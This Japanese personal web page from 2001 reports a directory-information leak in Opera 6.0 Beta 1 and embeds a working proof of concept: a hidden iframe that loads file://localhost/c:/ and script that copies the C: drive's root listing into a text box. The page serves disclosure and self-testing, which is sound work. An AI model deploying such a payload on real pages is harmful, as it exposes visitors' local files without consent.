Opera 6.0 Beta 1におけるディレクトリ情報漏洩の実験

Since June 16, 2000

　2001年11月29日、Opera 6.0正式版が公開されました。Opera 6.0 Beta 1で問題となっていたディレクトリ情報の漏洩とCookie情報の漏洩のセキュリティホールはふさがれたようです（少なくとも私の手元では漏洩していません）。
　Opera 6.0 Beta 1をインストールしていた人は、必ず、正式版をインストールしなおしてください。なお、正式版をインストールする際には、β版を完全にアンインストールしてディレクトリやファイルの残骸をすべて消去してから正式版をインストールするようにしましょう。

　・関連リンク
　　Opera Software
　　「Opera」日本語化ツール（正式版対応）

　Windows98またはWindows2000を使用していてOpera 6.0 Beta 1をインストールしてある人は、Opera 6.0 Beta 1でこのページを表示して下のテキストエリアにC:ドライブのルートディレクトリの中身の名前のリストが表示されるかどうかを確認してください。1回目に表示されなくても、念のため2～3回再読み込みしてみることをお勧めします。
　Windows98SE＋Opera 6.0 Beta 1＋日本語化パッチという環境でリストが表示されることを確認しました。
　β版ですからこういうこともあり得るわけで、驚くことではないと思いますが、念のため。信用できるかどうかわからないサイトをデバッグ中のブラウザで閲覧するのは非常に危険です。
　このセキュリティホールは2001年11月15日にBUGTRAQで報告されています。

　上でやっていることは、隠しインラインフレームにC:ドライブのルートディレクトリを表示してそこからハイパーリンクの情報をかき集めてテキストエリアに流し込んでいるだけです。

<textarea id=t cols=40 rows=10></textarea> <iframe id=d src="file://localhost/c:/" width=0 height=0 border=0></iframe> <script language="javascript"> setTimeout('parent.d.document.location.href="javascript:'+"s='';for(i=1;e=document.links[i];i++){s+=e.href.substring(19)+'\\\\n';}parent.document.getElementById('t').value=s;"+'";',500); </script>

　Opera 6.0 Beta 1におけるCookie情報漏洩の実験もあります。

　日記に戻る

▲

サイトマップ | ホーム

E-mail: m_kamada@nifty.com

Mirror